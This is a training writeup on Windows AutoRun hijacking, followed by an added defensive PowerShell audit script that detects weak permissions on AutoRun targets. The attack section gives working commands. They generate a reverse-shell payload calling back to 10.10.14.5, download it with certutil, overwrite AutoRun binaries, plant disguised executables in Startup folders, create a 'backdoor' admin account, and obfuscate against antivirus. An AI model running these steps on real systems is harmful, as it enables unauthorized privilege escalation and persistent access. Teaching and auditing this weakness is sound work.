AutoRun Exploitation

Intermediate · 25 min · Writeup

Exploiting weak permissions on AutoRun programs

Learning Objectives

  • Find AutoRun programs
  • Check file permissions
  • Replace AutoRun programs
  • Wait for privilege escalation

AutoRun entries tell Windows to execute programs automatically at startup or login. If an AutoRun program has weak permissions - meaning we can replace it - we can hijack the execution.

Patience Required

AutoRun exploitation requires waiting for the target user to log in or for the system to reboot. This is a plant-and-wait attack.

AutoRun Locations

AutoRun Registry Locations:

System-wide (all users):
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run

Per-user:
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

Startup Folders:
- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
- C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Enumerating AutoRun Entries

batch
REM Query AutoRun registry keys

REM System-wide AutoRun (HKLM)
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

REM Current user AutoRun (HKCU)
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

REM Check Startup folders
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

Using PowerUp

powershell
# PowerUp automates finding vulnerable AutoRun entries
Import-Module .\PowerUp.ps1

# Find modifiable AutoRun entries
Get-ModifiableRegistryAutoRun

Checking File Permissions

batch
REM For each AutoRun entry, check if we can modify the file

REM Check file permissions
icacls "C:\VulnApp\startup.exe"
REM Look for: BUILTIN\Users:(M) or (F)

REM Also check the directory
icacls "C:\VulnApp"
REM If directory is writable, we can replace/rename the file

REM Using accesschk (Sysinternals)
accesschk.exe /accepteula -wvu "C:\VulnApp\startup.exe"
accesschk.exe /accepteula -wvud "C:\VulnApp"

REM WinPEAS checks this automatically
.\winpeas.exe applicationsinfo

Check Directory Too

Even if the file isn't directly writable, if the DIRECTORY is writable, you can rename the original and place your malicious file.

Exploitation

batch
REM Exploiting Writable AutoRun Binary

REM 1. Verify we can write to it
icacls "C:\VulnApp\startup.exe"

REM 2. Backup original (optional)
copy "C:\VulnApp\startup.exe" "C:\VulnApp\startup.exe.bak"

REM 3. Generate payload (on attacker machine):
REM msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o startup.exe

REM 4. Transfer payload
certutil -urlcache -f http://10.10.14.5/startup.exe C:\temp\startup.exe

REM 5. Replace the AutoRun binary
copy /Y C:\temp\startup.exe "C:\VulnApp\startup.exe"

REM 6. Set up listener and wait for login/reboot

Alternative: Directory Writable

batch
REM If directory is writable but file is not:

REM 1. Rename original
move "C:\VulnApp\startup.exe" "C:\VulnApp\startup_orig.exe"

REM 2. Place our malicious file
copy C:\temp\malicious.exe "C:\VulnApp\startup.exe"

Startup Folder Exploitation

batch
REM Startup folders are another AutoRun mechanism

REM Check All Users Startup folder permissions
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

REM If writable:
copy C:\temp\shell.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe"

REM Current User Startup (always writable for current user)
copy C:\temp\shell.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe"

Payload Considerations

bash
# Payload options for AutoRun exploitation

# 1. Reverse shell (requires listener)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

# 2. Add admin user (no listener needed)
msfvenom -p windows/adduser USER=backdoor PASS=Password123! -f exe -o adduser.exe

AV Detection

AutoRun exploitation often fails due to antivirus. The malicious executable may be scanned and blocked. Consider obfuscation.

AutoRun Exploitation Methodology

AutoRun Hijacking Flow

1. Enumerate: query registry Run keys and Startup folders
2. Identify: find entries pointing to modifiable files
3. Verify: check permissions with icacls/accesschk
4. Backup: save the original binary if needed
5. Replace: overwrite with the malicious executable
6. Wait: wait for login/reboot to trigger
7. Access: use the new credentials or catch the shell
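The following PowerShell is an added audit script; it is not part of the original writeup and is not PowerUp's or WinPEAS's code. It covers the "Checking File Permissions" section and the flow above from the defender's side: it enumerates the Run keys and Startup folders listed earlier, resolves each target binary, flags files and parent directories that grant write-class rights to BUILTIN\Users, Authenticated Users or Everyone (the exact condition the writeup exploits, including the rename-and-replace case for writable directories), and keeps a SHA256 snapshot so a later run detects a replaced binary. It assumes an elevated PowerShell 5.1 or later session on the audited host; the snapshot location and the principal list are assumptions chosen for this example, and the HKCU keys inspected are those of the user running the audit.

```powershell
# Added audit example (not from the original writeup). Assumes an elevated
# PowerShell 5.1+ session on the audited host. HKCU keys are those of the
# auditing user; other users' hives are not loaded here.
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
$StartupDirs = @(
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
)
# Principals for which write access on an AutoRun target is a finding (assumed list).
$BroadPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
# Access-mask bits that allow replacing or creating the target: WriteData/AddFile,
# AppendData/AddSubdirectory, DeleteChild, Delete, ChangePermissions, TakeOwnership,
# plus GENERIC_WRITE and GENERIC_ALL for ACEs stored with generic rights.
$WriteMask = 0x2 -bor 0x4 -bor 0x40 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

function Resolve-AutoRunTarget {
    # Extract the executable path from a Run value such as
    #   "C:\Program Files\App\app.exe" /silent   or   C:\VulnApp\startup.exe -x
    param([string]$Command)
    $cmd = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 0) { return $cmd.Substring(1, $end - 1) }
        return $cmd.Trim('"')
    }
    # Unquoted: take the longest leading prefix that names an existing file,
    # so a path containing spaces is not cut at the first space.
    $parts = $cmd -split ' '
    for ($i = $parts.Count; $i -ge 1; $i--) {
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $parts[0]
}

function Get-AutoRunTarget {
    $targets = @()
    foreach ($key in $RunKeys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $regKey = Get-Item -LiteralPath $key
        foreach ($name in $regKey.GetValueNames()) {
            $cmd = [string]$regKey.GetValue($name)
            if ([string]::IsNullOrWhiteSpace($cmd)) { continue }
            $targets += [pscustomobject]@{ Source = "$key\$name"; Path = Resolve-AutoRunTarget $cmd }
        }
    }
    foreach ($dir in $StartupDirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        foreach ($file in Get-ChildItem -LiteralPath $dir -File) {
            $targets += [pscustomobject]@{ Source = $dir; Path = $file.FullName }
        }
    }
    return $targets
}

function Get-WeakAce {
    # Return Allow ACEs that give a broad principal write-class rights on $Path.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) {
            [pscustomobject]@{ Path = $Path; Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

function Invoke-AutoRunAudit {
    param([string]$SnapshotPath = "$env:ProgramData\AutoRunBaseline.json")  # hypothetical location
    $findings = @(); $current = @{}
    foreach ($t in Get-AutoRunTarget) {
        $dir = Split-Path -Parent $t.Path
        if (Test-Path -LiteralPath $t.Path -PathType Leaf) {
            $current[$t.Path] = (Get-FileHash -LiteralPath $t.Path -Algorithm SHA256).Hash
            $findings += Get-WeakAce $t.Path
        } else {
            # A missing target with a writable parent directory lets anyone plant the file.
            $findings += [pscustomobject]@{ Path = $t.Path; Principal = '(target missing)'; Rights = 'n/a' }
        }
        # Directory write access allows rename-and-replace even when the file itself is locked down.
        if ($dir) { $findings += Get-WeakAce $dir }
    }
    # Compare with the previous snapshot: a changed hash or a new entry is a detection.
    if (Test-Path -LiteralPath $SnapshotPath) {
        $previous = Get-Content -LiteralPath $SnapshotPath -Raw | ConvertFrom-Json
        foreach ($p in $current.Keys) {
            $old = $previous.PSObject.Properties[$p]
            if (-not $old) { Write-Warning "New AutoRun target since baseline: $p" }
            elseif ($old.Value -ne $current[$p]) { Write-Warning "AutoRun target changed since baseline: $p" }
        }
    }
    [pscustomobject]$current | ConvertTo-Json | Set-Content -LiteralPath $SnapshotPath
    $findings | Sort-Object Path, Principal -Unique | Format-Table -AutoSize
}

Invoke-AutoRunAudit
```

Run it once to record the baseline and again on a schedule; any row in the findings table is an entry a low-privileged user could hijack and should have the write ACE removed (for example with icacls /remove), and any warning is a changed or newly added AutoRun binary worth investigating. The generic-rights bits in the mask matter because some ACEs are stored as GENERIC_WRITE or GENERIC_ALL rather than the specific file rights icacls displays.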

Knowledge Check


When do HKLM Run entries execute?

Key Takeaways

  • AutoRun entries in HKLM Run execute for all users at login
  • Check file AND directory permissions with icacls
  • Hijack by replacing the binary the AutoRun points to
  • Startup folders are another AutoRun mechanism
  • Must wait for login/reboot to trigger exploitation